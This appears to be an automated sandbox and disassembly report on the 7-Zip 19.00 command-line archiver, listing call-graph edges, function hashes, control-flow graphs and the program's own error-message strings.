28707->28670 28718 675a09 28707->28718 28709 675cd0 28720 676060 free 28709->28720 28721 675cdb free free free 28709->28721 28722 675d48 28710->28722 28731 675d32 28710->28731 28732 67559e 28711->28732 28712->28621 28713->28670 28723 675aae 28713->28723 28715->28725 28738 67619c 28715->28738 28739 67618a 28715->28739 28717 6762d2 28964 67211c 13 API calls 28717->28964 28946 67211c 13 API calls 28718->28946 28719 675859 28728 675862 28719->28728 28729 67590d 28719->28729 28720->28655 28721->28561 28952 66a8a0 24 API calls 28722->28952 28947 666d48 47 API calls 28723->28947 28724 6757a5 28736 6757e7 free free free 28724->28736 28737 6757ab free free free 28724->28737 28725->28661 28725->28764 28942 672094 7 API calls 28728->28942 28943 666a04 41 API calls 28729->28943 28744 663208 2 API calls 28730->28744 28746 663404 4 API calls 28731->28746 28747 6755a5 free free free free 28732->28747 28748 6755ed 28732->28748 28735 676484 28751 6764ee 28735->28751 28777 663314 3 API calls 28735->28777 28736->28561 28737->28561 28962 666b2c 41 API calls 28738->28962 28752 663404 4 API calls 28739->28752 28740 6762e6 28753 6762ec free free 28740->28753 28754 67632a free free 28740->28754 28742 675a1d 28756 675a23 free free free 28742->28756 28757 675a5f free free free 28742->28757 28759 675bcb 28744->28759 28761 675d43 28746->28761 28747->28561 28763 675765 free 28748->28763 28775 6756b4 28748->28775 28783 675714 free free free free 28748->28783 28784 67560c 28748->28784 28749 675ab8 28749->28670 28762 675ac1 GetLastError 28749->28762 28750 675d61 28750->28761 28953 672094 7 API calls 28750->28953 28751->28764 28797 676518 free free 28751->28797 28752->28725 28753->28561 28754->28561 28755 6761aa 28766 6761af 28755->28766 28767 676228 28755->28767 28756->28561 28757->28561 28758 675876 28768 6758c3 free free free free 28758->28768 28769 67587c free free free free 28758->28769 28770 667ebc 90 API calls 28759->28770 28760 67591c 28772 6759d5 free 28760->28772 28773 675925 28760->28773 28779 676055 free 28761->28779 28789 675e66 28761->28789 28790 675de2 28761->28790 28762->28670 28774 675ad0 28762->28774 28763->28665 28764->28561 28963 672204 7 API calls 28766->28963 28767->28725 28768->28561 28769->28561 28781 675bde 28770->28781 28772->28670 28944 672204 7 API calls 28773->28944 28948 67211c 13 API calls 28774->28948 28775->28763 28785 6764a6 28777->28785 28778 676368 28778->28735 28788 668c98 3 API calls 28778->28788 28779->28720 28792 675bfd free free 28781->28792 28901 6668a0 28781->28901 28783->28561 28794 675614 28784->28794 28795 6756c3 free free free free 28784->28795 28967 673210 6 API calls 28785->28967 28787 675d7d 28787->28761 28799 675d84 free free free free 28787->28799 28800 6763b0 28788->28800 28789->28779 28956 6694a4 malloc _CxxThrowException free memset 28789->28956 28954 666b2c 41 API calls 28790->28954 28791 6761c6 28803 6761cc free free 28791->28803 28804 6761fa free free 28791->28804 28792->28670 28793 67593e 28806 675944 free free free free 28793->28806 28807 67598b free free free free 28793->28807 28794->28775 28808 67561c 28794->28808 28795->28561 28797->28561 28798 675ae4 28811 675b26 free free free 28798->28811 28812 675aea free free free 28798->28812 28799->28561 28813 676415 28800->28813 28965 67211c 13 API calls 28800->28965 28802 675df1 28802->28779 28955 672204 7 API calls 28802->28955 28816 67597b 28803->28816 28804->28816 28806->28816 28807->28816 28818 675620 free free free free 28808->28818 28819 67566a free free free free 28808->28819 28809 6764bf 28820 6764e4 free 28809->28820 28826 663404 4 API calls 28809->28826 28811->28816 28812->28816 28915 668adc 28813->28915 28815 675e92 28824 67604a free 28815->28824 28829 663208 2 API calls 28815->28829 28816->28561 28818->28561 28819->28561 28820->28751 28824->28779 28830 6764e3 28826->28830 28827 6763cf 28827->28813 28831 6763d6 free free 28827->28831 28828 675e13 28828->28779 28832 675e1e free free free free 28828->28832 28834 675eb6 28829->28834 28830->28820 28831->28561 28832->28816 28837 663208 2 API calls 28834->28837 28836 67643e 28836->28735 28838 676445 free free 28836->28838 28839 675ec4 28837->28839 28838->28561 28957 6692d4 malloc _CxxThrowException _CxxThrowException free 28839->28957 28842 675eeb 28843 675ef4 28842->28843 28844 675f83 28842->28844 28958 672094 7 API calls 28843->28958 28959 669828 130 API calls 28844->28959 28847 675f0a 28849 675f15 7 API calls 28847->28849 28850 67602f free free 28847->28850 28848 675f9d 28848->28850 28960 67211c 13 API calls 28848->28960 28849->28561 28850->28824 28852 675fba 28852->28850 28853 675fc1 7 API calls 28852->28853 28853->28561 28855 68ecd3 28854->28855 28856 68ed02 28854->28856 28855->28856 28858 68eceb free free 28855->28858 28857 68b204 VariantClear 28856->28857 28859 68ed27 28857->28859 28858->28855 28860 674540 28859->28860 28968 68dfa4 14 API calls 28859->28968 28860->28480 28860->28481 28860->28561 28862 68ed47 28862->28860 28863 663404 4 API calls 28862->28863 28864 68ed5b 28863->28864 28865 68b204 VariantClear 28864->28865 28876 68ed7b 28864->28876 28865->28876 28866 68ef2c 28971 68e954 19 API calls 28866->28971 28867 68eff6 28972 664d78 10 API calls 28867->28972 28868 68eebc 28871 66339c 4 API calls 28868->28871 28872 68eefa 28868->28872 28871->28872 28872->28866 28872->28867 28873 68ee0f 28875 66ae2c VariantClear 28873->28875 28874 68ee32 28874->28873 28879 68ee55 28874->28879 28970 68dfa4 14 API calls 28874->28970 28875->28860 28876->28860 28876->28868 28876->28873 28876->28874 28969 6634c0 malloc _CxxThrowException SysStringLen free 28876->28969 28877 68ef3e 28877->28860 28880 66339c 4 API calls 28877->28880 28882 68ef8f 28877->28882 28883 66ae2c VariantClear 28879->28883 28880->28882 28882->28860 28884 68efe0 free free 28882->28884 28883->28868 28884->28860 28885 68ee7a 28885->28873 28886 68b204 VariantClear 28885->28886 28887 68ee9b 28886->28887 28887->28873 28887->28879 28890 68b234 28888->28890 28889 66ae2c VariantClear 28891 6749de 28889->28891 28890->28889 28891->28517 28891->28561 28894 672023 28892->28894 28893 66ae2c VariantClear 28895 67206a 28893->28895 28894->28893 28895->28561 28895->28578 28897 663208 2 API calls 28896->28897 28898 6863f5 28897->28898 28899 6750fa 28898->28899 28900 66362c 6 API calls 28898->28900 28899->28590 28899->28592 28899->28600 28900->28898 28902 6668bb 28901->28902 28903 6668d5 28902->28903 28904 6668c2 SetFileAttributesW 28902->28904 28905 6668d1 28903->28905 28906 663208 2 API calls 28903->28906 28904->28903 28904->28905 28905->28792 28907 6668e3 28906->28907 28908 66a7ec 35 API calls 28907->28908 28909 6668f8 28908->28909 28910 66691c free 28909->28910 28911 6668fc SetFileAttributesW free 28909->28911 28910->28905 28911->28905 28913 668cdc 39 API calls 28912->28913 28914 669242 28913->28914 28914->28717 28914->28778 28916 668a60 2 API calls 28915->28916 28917 668aef 28916->28917 28917->28735 28966 67211c 13 API calls 28917->28966 28920->28540 28921->28551 28922->28522 28923->28522 28924->28534 28925->28534 28926->28525 28927->28536 28928->28537 28929->28570 28930->28537 28931->28585 28932->28594 28933->28608 28934->28612 28935->28609 28936->28691 28937->28635 28938->28690 28939->28692 28940->28724 28941->28719 28942->28758 28943->28760 28944->28793 28945->28707 28946->28742 28947->28749 28948->28798 28949->28668 28950->28679 28951->28709 28952->28750 28953->28787 28954->28802 28955->28828 28956->28815 28957->28842 28958->28847 28959->28848 28960->28852 28961->28667 28962->28755 28963->28791 28964->28740 28965->28827 28966->28836 28967->28809 28968->28862 28970->28885 28971->28877 28972->28860

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 006A8817 Relevance: 130.3, APIs: 62, Strings: 12, Instructions: 780COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                                                                                                                            • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                                                                                                                            • API String ID: 3442115484-272389550
                                                                                                                                                                                                                                                                            • Opcode ID: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
                                                                                                                                                                                                                                                                            • Instruction ID: 1b610f74e587a1e343150742b51ebfeb66148ed6d4f33313127d9f3b5c82002d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD72AE72304A818ADB64FF25E4903AE7363F78AB80F408116DA8A57758DF3DC859CF85
                                                                                                                                                                                                                                                                            Function 006824C0 Relevance: 102.2, APIs: 81, Instructions: 981COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3352498445-0
                                                                                                                                                                                                                                                                            • Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                                                                                            • Instruction ID: 849ad7509f7dfd4bcf8af574183d7879e69a0bb18874d44aea1d4e279dbc26b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E826372218BC186CB70EF25E4A03AEB362F786B94F504226DB8D57B59DF78C945CB04
                                                                                                                                                                                                                                                                            Function 006847AC Relevance: 86.1, APIs: 56, Strings: 1, Instructions: 647COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1635 6847ac-68485c call 663314 * 2 1640 68489a-68491b call 686344 call 6632bc call 663b5c free * 2 call 663208 call 663314 1635->1640 1641 68485e-684884 call 662880 1635->1641 1656 6849bd-6849cb call 66477c 1640->1656 1657 684921-684925 1640->1657 1641->1640 1647 684886-684895 call 663404 1641->1647 1647->1640 1662 684dff 1656->1662 1663 6849d1-6849e7 1656->1663 1657->1656 1659 68492b-68495e call 663208 call 66449c 1657->1659 1674 6849b0-6849b8 free 1659->1674 1675 684960-68496f 1659->1675 1666 684e02-684e05 1662->1666 1671 684a68-684ad2 call 663208 * 3 1663->1671 1672 6849e9-684a28 free * 4 1663->1672 1667 684e40-684e45 1666->1667 1668 684e07-684e1c call 662130 1666->1668 1676 684e5d-684e62 call 6670c8 1667->1676 1677 684e47-684e58 call 663518 1667->1677 1687 684e1e-684e2e call 663314 1668->1687 1688 684e30 1668->1688 1720 684ad8-684adb 1671->1720 1721 684d30-684d3b 1671->1721 1678 684a58-684a63 free 1672->1678 1679 684a2a 1672->1679 1674->1656 1681 68497a-68498b 1675->1681 1682 684971-684978 1675->1682 1693 684e67-684e6a 1676->1693 1694 684f2c-684f98 call 673f0c 1677->1694 1690 68504a-685059 free 1678->1690 1686 684a2e-684a41 1679->1686 1689 684993-684996 1681->1689 1682->1681 1682->1689 1696 684a43-684a4f free * 2 1686->1696 1697 684a54-684a56 1686->1697 1700 684e33-684e3b call 66b8f0 1687->1700 1688->1700 1689->1674 1699 684998-6849ad call 663404 1689->1699 1701 68523b-68524e 1690->1701 1693->1694 1695 684e70-684eea GetLastError call 663518 call 66362c free * 4 1693->1695 1715 68505e-685062 1694->1715 1716 684f9e-684fa2 1694->1716 1723 684f1a-684f27 free 1695->1723 1724 684eec 1695->1724 1696->1697 1697->1678 1697->1686 1699->1674 1700->1667 1718 68506e 1715->1718 1719 685064-68506c 1715->1719 1716->1715 1722 684fa8-684fac 1716->1722 1725 685071-68507d 1718->1725 1719->1718 1719->1725 1726 684add-684ae0 1720->1726 1727 684b24-684b3e call 68ec5c 1720->1727 1728 684df0-684dfd call 672a84 1721->1728 1729 684d41-684dae call 672a84 free * 4 1721->1729 1722->1715 1730 684fb2-684fc7 call 6732e8 1722->1730 1723->1690 1732 684ef0-684f03 1724->1732 1735 685152-68516d 1725->1735 1736 685083-6850d1 1725->1736 1726->1727 1737 684ae2-684aee 1726->1737 1749 684c9d-684cee call 672a84 free * 4 1727->1749 1750 684b44 1727->1750 1728->1666 1793 684dde-684deb free 1729->1793 1794 684db0 1729->1794 1730->1715 1748 684fcd-68500d free * 4 1730->1748 1742 684f15-684f18 1732->1742 1743 684f05-684f10 free * 2 1732->1743 1746 685173 1735->1746 1774 685143-685150 call 66ae2c 1736->1774 1775 6850d3-6850de 1736->1775 1738 684b4c-684b50 1737->1738 1739 684af0-684af7 1737->1739 1751 684b60-684b63 1738->1751 1752 684b52-684b5a 1738->1752 1739->1738 1747 684af9-684b14 call 68b290 1739->1747 1742->1723 1742->1732 1743->1742 1754 685175-68517b 1746->1754 1777 684c0a-684c5b call 672a84 free * 4 1747->1777 1778 684b1a-684b22 1747->1778 1757 68503d-685048 free 1748->1757 1758 68500f 1748->1758 1783 684d1e-684d2b free 1749->1783 1784 684cf0 1749->1784 1750->1738 1761 684bc1-684bc4 1751->1761 1762 684b65-684b80 call 664318 1751->1762 1752->1751 1760 684bf5-684bff 1752->1760 1764 68517d-685188 call 676cd0 1754->1764 1765 685190-68519e call 6a1850 1754->1765 1757->1690 1768 685013-685026 1758->1768 1760->1720 1772 684c05 1760->1772 1769 684be3-684bf2 call 6ac7d4 1761->1769 1770 684bc6-684be1 call 6743fc 1761->1770 1790 684b82-684b85 1762->1790 1791 684b87-684b9e 1762->1791 1764->1765 1788 6851a1-6851a6 1765->1788 1780 685038-68503b 1768->1780 1781 685028-685033 free * 2 1768->1781 1769->1760 1770->1760 1770->1769 1772->1721 1774->1754 1775->1774 1792 6850e0-6850e3 1775->1792 1810 684c8b-684c98 free 1777->1810 1811 684c5d 1777->1811 1778->1738 1780->1757 1780->1768 1781->1780 1783->1690 1789 684cf4-684d07 1784->1789 1805 6851a8-6851b0 call 676cd0 1788->1805 1806 6851b1-6851f1 free * 4 1788->1806 1807 684d19-684d1c 1789->1807 1808 684d09-684d14 free * 2 1789->1808 1790->1761 1800 684baf-684bb3 1791->1800 1801 684ba0-684ba8 1791->1801 1802 685138-685140 1792->1802 1803 6850e5-6850e7 1792->1803 1793->1690 1804 684db4-684dc7 1794->1804 1800->1761 1816 684bb5-684bbd 1800->1816 1801->1761 1815 684baa-684bad 1801->1815 1802->1774 1817 6850e9-6850eb 1803->1817 1818 68512b-685136 1803->1818 1819 684dd9-684ddc 1804->1819 1820 684dc9-684dd4 free * 2 1804->1820 1805->1806 1813 685221-685239 free * 2 1806->1813 1814 6851f3 1806->1814 1807->1783 1807->1789 1808->1807 1810->1690 1821 684c61-684c74 1811->1821 1813->1701 1825 6851f7-68520a 1814->1825 1815->1761 1816->1761 1822 6850ed-6850f0 1817->1822 1823 68511f-685129 1817->1823 1818->1774 1819->1793 1819->1804 1820->1819 1826 684c86-684c89 1821->1826 1827 684c76-684c81 free * 2 1821->1827 1830 685112-68511d 1822->1830 1831 6850f2-685111 _CxxThrowException 1822->1831 1823->1774 1828 68521c-68521f 1825->1828 1829 68520c-685217 free * 2 1825->1829 1826->1810 1826->1821 1827->1826 1828->1813 1828->1825 1829->1828 1830->1774 1831->1830
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Can not create output directory: , xrefs: 00684E83
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                                                                                                                            • String ID: Can not create output directory:
                                                                                                                                                                                                                                                                            • API String ID: 4159955631-3123869724
                                                                                                                                                                                                                                                                            • Opcode ID: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
                                                                                                                                                                                                                                                                            • Instruction ID: f25dbc01444833b5f3fa9b71b369afd85759667d764d206d7e92e67990fdace5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3428F72219AC196CB70EF25E8903AEB362F7C6B80F445226DB8D53B59DF38C955CB04
                                                                                                                                                                                                                                                                            Function 00685458 Relevance: 74.2, APIs: 47, Strings: 2, Instructions: 702COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 2037 685458-6854e2 2038 6854f2-6854f6 2037->2038 2039 6854e4-6854f0 2037->2039 2040 6854fe-685504 2038->2040 2039->2040 2041 68550a 2040->2041 2042 6855ec-6855fd 2040->2042 2043 68550d-685538 call 667d28 call 663208 2041->2043 2044 6855ff-68560a call 662130 2042->2044 2045 685612-685615 2042->2045 2060 68553a-68554c call 667ebc 2043->2060 2061 68556c-68559c call 66b8f0 free 2043->2061 2044->2045 2048 685624-685639 call 662130 2045->2048 2049 685617-68561f memset 2045->2049 2055 685648 2048->2055 2056 68563b-68563e call 673524 2048->2056 2049->2048 2059 68564b-685656 2055->2059 2063 685643-685646 2056->2063 2065 685658-685661 2059->2065 2066 685662-6856d1 call 6843b0 2059->2066 2067 685551-685554 2060->2067 2061->2043 2072 6855a2 2061->2072 2063->2059 2065->2066 2077 6856fd-685715 2066->2077 2078 6856d3-6856e3 2066->2078 2070 6855a4-6855c7 _CxxThrowException 2067->2070 2071 685556-685562 2067->2071 2075 6855c8-6855eb _CxxThrowException 2070->2075 2071->2075 2076 685564 2071->2076 2072->2042 2075->2042 2076->2061 2079 68571b-68571e 2077->2079 2080 685f1d-685f22 2077->2080 2078->2077 2085 6856e5-6856f8 free 2078->2085 2082 685726-68572a 2079->2082 2083 685f29-685f3d 2080->2083 2084 685f24-685f27 2080->2084 2086 685730-68575f call 667d28 call 663208 2082->2086 2087 685c37-685c50 2082->2087 2092 685f3f-685f52 free 2083->2092 2093 685f54-685f67 2083->2093 2084->2083 2088 685f8d-686002 free * 2 2084->2088 2097 685f7c-685f8b free 2085->2097 2104 685761-685770 2086->2104 2105 685772-68577e call 667ebc 2086->2105 2087->2082 2090 685c56-685c5a 2087->2090 2099 686004-686017 2088->2099 2090->2080 2092->2097 2093->2088 2103 685f69-685f7b free 2093->2103 2097->2099 2103->2097 2106 68579e-6857b4 call 6a1544 2104->2106 2109 685783-685786 2105->2109 2113 6857ba-68586c call 684504 call 6842a8 call 6840c4 call 663404 call 694c00 2106->2113 2114 685c5f-685c80 free * 2 2106->2114 2110 685ef9-685f1c _CxxThrowException 2109->2110 2111 68578c-685798 2109->2111 2110->2080 2111->2106 2111->2110 2126 68587d-685883 2113->2126 2127 68586e-685876 2113->2127 2114->2097 2129 685889-6858b3 call 6a1bc0 2126->2129 2130 685c85-685c9e free 2126->2130 2128 685878 2127->2128 2127->2129 2128->2126 2136 6858b9-6858bc 2129->2136 2137 685d02-685d1e free 2129->2137 2131 685cbe-685cfd free call 684610 free * 2 2130->2131 2132 685ca0 2130->2132 2131->2097 2134 685ca4-685cbc free 2132->2134 2134->2131 2134->2134 2139 6859b1-6859bd 2136->2139 2140 6858c2-6858d3 2136->2140 2141 685d3e-685d7b free call 684610 free * 2 2137->2141 2142 685d20 2137->2142 2145 685a8e-685a93 2139->2145 2146 6859c3-6859cd 2139->2146 2143 685933 2140->2143 2144 6858d5-685907 call 667d28 call 663208 call 667ebc 2140->2144 2141->2097 2148 685d24-685d3c free 2142->2148 2150 685936-68594f free 2143->2150 2195 685909-685915 2144->2195 2196 685924-685931 free 2144->2196 2152 685aa1-685ab9 2145->2152 2153 6859d3-6859e1 2146->2153 2154 685a95-685a9a 2146->2154 2148->2141 2148->2148 2156 68596f-6859ac free call 684610 free 2150->2156 2157 685951 2150->2157 2161 685abb-685ac3 2152->2161 2162 685acc 2152->2162 2159 6859e3-6859ed 2153->2159 2160 685a55-685a58 2153->2160 2154->2152 2156->2087 2164 685955-68596d free 2157->2164 2169 6859f5-685a11 call 684434 2159->2169 2165 685a5a-685a86 2160->2165 2166 685a9c 2160->2166 2161->2162 2170 685ac5-685aca 2161->2170 2171 685acf-685b54 call 6847ac 2162->2171 2164->2156 2164->2164 2182 685a8c 2165->2182 2183 685d80-685d9c free 2165->2183 2166->2152 2185 685a21-685a30 2169->2185 2186 685a13-685a15 2169->2186 2170->2171 2180 685b5a-685b61 2171->2180 2181 685dfe-685e1a free 2171->2181 2189 685b80 2180->2189 2190 685b63-685b7e 2180->2190 2193 685e3a-685e77 free call 684610 free * 2 2181->2193 2194 685e1c 2181->2194 2182->2152 2191 685dbc-685df9 free call 684610 free * 2 2183->2191 2192 685d9e 2183->2192 2185->2169 2188 685a32-685a52 2185->2188 2186->2185 2187 685a17-685a1d 2186->2187 2187->2185 2188->2160 2197 685b88-685bb6 2189->2197 2190->2197 2191->2097 2198 685da2-685dba free 2192->2198 2193->2097 2200 685e20-685e38 free 2194->2200 2195->2196 2202 685917-68591f 2195->2202 2196->2150 2203 685e7c-685e95 free 2197->2203 2204 685bbc-685bd6 free 2197->2204 2198->2191 2198->2198 2200->2193 2200->2200 2202->2196 2207 685eb5-685ef4 free call 684610 free * 2 2203->2207 2208 685e97 2203->2208 2209 685bd8-685bdc 2204->2209 2210 685bff-685c12 free call 684610 2204->2210 2207->2097 2212 685e9b-685eb3 free 2208->2212 2214 685bde-685bf5 free 2209->2214 2219 685c17-685c35 free 2210->2219 2212->2207 2212->2212 2214->2214 2218 685bf7 2214->2218 2218->2210 2219->2087
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrow$memset
                                                                                                                                                                                                                                                                            • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                                                                                                                            • API String ID: 4182836161-2069749860
                                                                                                                                                                                                                                                                            • Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                                                                                            • Instruction ID: 193f59f2f5e657cbcfa48d5d0f7e8a22bf9bec125d6391484926dd3e29a4733e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E526E72209EC186CB60EF25E4943AEB762F786B84F405216DF9E63B65DF38C855CB04
                                                                                                                                                                                                                                                                            Function 0068F13E Relevance: 59.4, APIs: 47, Instructions: 683COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
                                                                                                                                                                                                                                                                            • Instruction ID: ecd53e0c6fb71289a42bc94aed5f0c098d691d783c2797e2c71089085bd9c761
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D542B277209AC086CB64EF25E0A06AFB766F3CAB88F551116EB4E57B15CF39C489C704
                                                                                                                                                                                                                                                                            Function 00670DCC Relevance: 51.4, APIs: 17, Strings: 12, Instructions: 652COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • I won't write data and program's messages to same stream, xrefs: 006714B3, 00671782
                                                                                                                                                                                                                                                                            • I won't write compressed data to a terminal, xrefs: 00671741
                                                                                                                                                                                                                                                                            • -ai switch is not supported for this command, xrefs: 006715C3
                                                                                                                                                                                                                                                                            • The command must be specified, xrefs: 00670DF5
                                                                                                                                                                                                                                                                            • stdout mode and email mode cannot be combined, xrefs: 00671710
                                                                                                                                                                                                                                                                            • Unsupported command:, xrefs: 00670E57
                                                                                                                                                                                                                                                                            • Only one archive can be created with rename command, xrefs: 006717E1
                                                                                                                                                                                                                                                                            • Cannot use absolute pathnames for this command, xrefs: 0067138C
                                                                                                                                                                                                                                                                            • Cannot find archive name, xrefs: 0067110A
                                                                                                                                                                                                                                                                            • Incorrect Number of benmchmark iterations, xrefs: 00671847
                                                                                                                                                                                                                                                                            • Unsupported -spf:, xrefs: 00670F7E
                                                                                                                                                                                                                                                                            • Archive name cannot by empty, xrefs: 00671151
                                                                                                                                                                                                                                                                            Memory Dump Source
